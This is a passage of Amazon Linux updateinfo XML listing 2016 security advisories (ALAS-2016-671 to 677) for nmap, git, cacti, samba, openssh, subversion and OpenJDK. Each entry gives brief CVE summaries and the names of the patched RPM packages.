arch="i686"><filename>Packages/php54-mysql-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.45-1.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-671</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-671: low priority package update for nmap</title><issued date="2016-03-22 11:00:00" /><updated date="2016-03-22 11:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4885:
The http-domino-enum-passwords.nse script in NMap before 6.40, when domino-enum-passwords.idpath is set, allows remote servers to upload &quot;arbitrarily named&quot; files via a crafted FullName parameter in a response, as demonstrated using directory traversal sequences.
995634:
CVE-2013-4885 nmap: arbitrary file upload flaw in http-domino-enum-passwords NSE script
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4885" title="" id="CVE-2013-4885" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nmap-ncat" version="6.40" release="7.19.amzn1" epoch="2" arch="x86_64"><filename>Packages/nmap-ncat-6.40-7.19.amzn1.x86_64.rpm</filename></package><package name="nmap-debuginfo" version="6.40" release="7.19.amzn1" epoch="2" arch="x86_64"><filename>Packages/nmap-debuginfo-6.40-7.19.amzn1.x86_64.rpm</filename></package><package name="nmap" version="6.40" release="7.19.amzn1" epoch="2" arch="x86_64"><filename>Packages/nmap-6.40-7.19.amzn1.x86_64.rpm</filename></package><package name="nmap-debuginfo" version="6.40" release="7.19.amzn1" epoch="2" arch="i686"><filename>Packages/nmap-debuginfo-6.40-7.19.amzn1.i686.rpm</filename></package><package name="nmap" version="6.40" release="7.19.amzn1" epoch="2" arch="i686"><filename>Packages/nmap-6.40-7.19.amzn1.i686.rpm</filename></package><package name="nmap-ncat" version="6.40" release="7.19.amzn1" epoch="2" arch="i686"><filename>Packages/nmap-ncat-6.40-7.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-672</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-672: important priority package update for git</title><issued date="2016-03-24 12:00:00" /><updated date="2016-03-24 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2324:
An integer truncation flaw and an integer overflow flaw, both leading to a heap-based buffer overflow, were found in the way Git processed certain path information. A remote attacker could create a specially crafted Git repository that would cause a Git client or server to crash or, possibly, execute arbitrary code.
1317981:
CVE-2016-2315 CVE-2016-2324 git: path_name() integer truncation and overflow leading to buffer overflow
CVE-2016-2315:
An integer truncation flaw and an integer overflow flaw, both leading to a heap-based buffer overflow, were found in the way Git processed certain path information. A remote attacker could create a specially crafted Git repository that would cause a Git client or server to crash or, possibly, execute arbitrary code.
1317981:
CVE-2016-2315 CVE-2016-2324 git: path_name() integer truncation and overflow leading to buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2315" title="" id="CVE-2016-2315" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2324" title="" id="CVE-2016-2324" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="emacs-git-el" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.7.4" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.7.4-1.47.amzn1.x86_64.rpm</filename></package><package name="git-debuginfo" version="2.7.4" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.7.4-1.47.amzn1.x86_64.rpm</filename></package><package name="git" version="2.7.4" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.7.4-1.47.amzn1.x86_64.rpm</filename></package><package name="git-all" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.7.4" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.7.4-1.47.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git" version="2.7.4" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.7.4-1.47.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.7.4" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.7.4-1.47.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.7.4" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.7.4-1.47.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.7.4" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.7.4-1.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-673</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-673: medium priority package update for cacti</title><issued date="2016-03-24 12:00:00" /><updated date="2016-06-03 18:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8604:
CVE-2015-8377:
CVE-2015-4634:
CVE-2015-4454:
CVE-2015-4342:
CVE-2015-2665:
CVE-2014-5026:
CVE-2014-5025:
CVE-2013-5589:
SQL injection vulnerability in cacti/host.php in Cacti 0.8.8b and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
1000860:
CVE-2013-5588 CVE-2013-5589 cacti: XSS and SQL injection flaws
CVE-2013-5588:
Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.8b and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the step parameter to install/index.php or (2) the id parameter to cacti/host.php.
1000860:
CVE-2013-5588 CVE-2013-5589 cacti: XSS and SQL injection flaws
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5588" title="" id="CVE-2013-5588" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5589" title="" id="CVE-2013-5589" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5025" title="" id="CVE-2014-5025" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5026" title="" id="CVE-2014-5026" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2665" title="" id="CVE-2015-2665" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4342" title="" id="CVE-2015-4342" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4454" title="" id="CVE-2015-4454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4634" title="" id="CVE-2015-4634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8377" title="" id="CVE-2015-8377" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8604" title="" id="CVE-2015-8604" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="0.8.8g" release="7.6.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.8g-7.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-674</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-674: medium priority package update for samba</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7560:
A flaw was found in the way Samba handled ACLs on symbolic links. An authenticated user could use this flaw to gain access to an arbitrary file or directory by overwriting its ACL.
1309992:
CVE-2015-7560 samba: Incorrect ACL get/set allowed on symlink path
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7560" title="" id="CVE-2015-7560" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.2.3" release="12.31.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.2.3-12.31.amzn1.noarch.rpm</filename></package><package name="samba-python" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-test-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-devel-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="ctdb-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-devel-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.2.3" release="12.31.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.2.3-12.31.amzn1.noarch.rpm</filename></package><package name="samba-client-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-test-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-devel-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="ctdb-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-devel-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.2.3-12.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-675</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-675: medium priority package update for openssh</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1908:
An access flaw was discovered in OpenSSH&amp;#59; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested.
1298741:
CVE-2016-1908 openssh: possible fallback from untrusted to trusted X11 forwarding
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1908" title="" id="CVE-2016-1908" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-debuginfo" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.6.1p1-25.61.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.6.1p1-25.61.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.25.61.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.6.1p1-25.61.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.6.1p1-25.61.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.6.1p1-25.61.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.6.1p1-25.61.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.6.1p1-25.61.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.6.1p1-25.61.amzn1.i686.rpm</filename></package><package name="openssh" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.6.1p1-25.61.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.6.1p1-25.61.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.25.61.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.25.61.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.6.1p1-25.61.amzn1.i686.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.6.1p1-25.61.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-676</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-676: important priority package update for mod_dav_svn subversion</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5343:
1289959:
CVE-2015-5343 subversion: (mod_dav_svn) integer overflow when parsing skel-encoded request bodies
CVE-2015-5259:
Integer overflow in the read_string function in libsvn_ra_svn/marshal.c in Apache Subversion 1.9.x before 1.9.3 allows remote attackers to execute arbitrary code via an svn:// protocol string, which triggers a heap-based buffer overflow and an out-of-bounds read.
1289958:
CVE-2015-5259 subversion: integer overflow in the svn:// protocol parser
CVE-2015-3187:
It was found that when an SVN server (both svnserve and httpd with the mod_dav_svn module) searched the history of a file or a directory, it would disclose its location in the repository if that file or directory was not readable (for example, if it had been moved).
1247252:
CVE-2015-3187 subversion: svn_repos_trace_node_locations() reveals paths hidden by authz
CVE-2015-3184:
It was found that the mod_authz_svn module did not properly restrict anonymous access to Subversion repositories under certain configurations when used with Apache httpd 2.4.x. This could allow a user to anonymously access files in a Subversion repository, which should only be accessible to authenticated users.
1247249:
CVE-2015-3184 subversion: Mixed anonymous/authenticated path-based authz with httpd 2.4
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3184" title="" id="CVE-2015-3184" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3187" title="" id="CVE-2015-3187" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5259" title="" id="CVE-2015-5259" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5343" title="" id="CVE-2015-5343" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_dav_svn" version="1.8.15" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.8.15-1.52.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.8.15" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-debuginfo-1.8.15-1.52.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.8.15" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.8.15-1.52.amzn1.i686.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.8.15" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-debuginfo-1.8.15-1.52.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.8.15-1.54.amzn1.i686.rpm</filename></package><package name="subversion-python26" version="1.8.15" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.8.15-1.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-677</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-677: critical priority package update for java-1.8.0-openjdk java-1.7.0-openjdk</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0636:
An improper type safety check was discovered in the Hotspot component. An untrusted Java application or applet could use this flaw to bypass Java Sandbox restrictions.
1320650:
